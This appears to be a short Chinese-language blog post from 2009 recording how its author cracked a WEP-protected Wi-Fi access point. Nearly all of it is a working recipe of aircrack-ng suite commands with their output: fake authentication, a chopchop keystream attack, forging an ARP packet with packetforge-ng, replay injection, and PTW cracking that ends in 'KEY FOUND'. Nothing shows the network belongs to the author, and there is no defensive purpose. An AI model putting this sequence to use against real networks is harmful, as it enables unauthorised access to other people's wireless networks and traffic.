2009年11月5日 星期四

(1-4-2) 攻擊模式

一直沒機會用到第四號攻擊,沒想到,這一次實現了。

一個帶有client的ap,用(1-5-2)採不到xor,用(1-3)得不到cap檔,用(1-2)祗讀取而不發送;最後祗了以第四號攻擊一試。竟一試達陣。

一,
1.airodump-ng --bssid [ap' mac] -c 1 --ivs -w home mon0
a.以存取ivs模式進入頻道一之監控。

二,
1.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.一號攻擊,以自己mac取得ap聯繫。結果:Association successful :-) (AID: 1)

2.aireplay-ng -5 -b $AP -h $MAC mon0
a.以第五號模式攻擊。結果:Still nothing, trying another packet...

3.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.改以第三號模式攻擊。結果:(got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

4.aireplay-ng -4 -b $AP -h $MAC mon0
a.以第四號模式攻擊。
b.Use this packet ? y
c.Saving chosen packet in replay_src-1106-140117.cap

Offset 87 ( 3% done) | xor = EA | pt = BD | 582 frames written in 9908ms
Offset 86 ( 5% done) | xor = A6 | pt = EF | 256 frames written in 4341ms
Offset 85 ( 7% done) | xor = 5C | pt = B4 | 275 frames written in 4677ms
...
Saving plaintext in replay_dec-1106-140237.cap
Saving keystream in replay_dec-1106-140237.xor
Completed in 76s (0.68 bytes/s)

5.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1106-140237.xor -w home-arp
a.把從第四號攻擊得到的xor檔,轉成arp檔。

6.aireplay-ng -2 -r home-arp -x 1024 mon0
a.以arp檔進行第二號攻擊。
b.Use this packet ? y

data終於開始增加了。 good!

三,
1.aircrack-ng -x -f 2 -s home-02.ivs
a.解由airodump所存取的ivs檔。
Starting PTW attack with 43436 ivs.
KEY FOUND! [ xx:xx:xx:xx:xx ]
Decrypted correctly: 100%

沒有留言:

張貼留言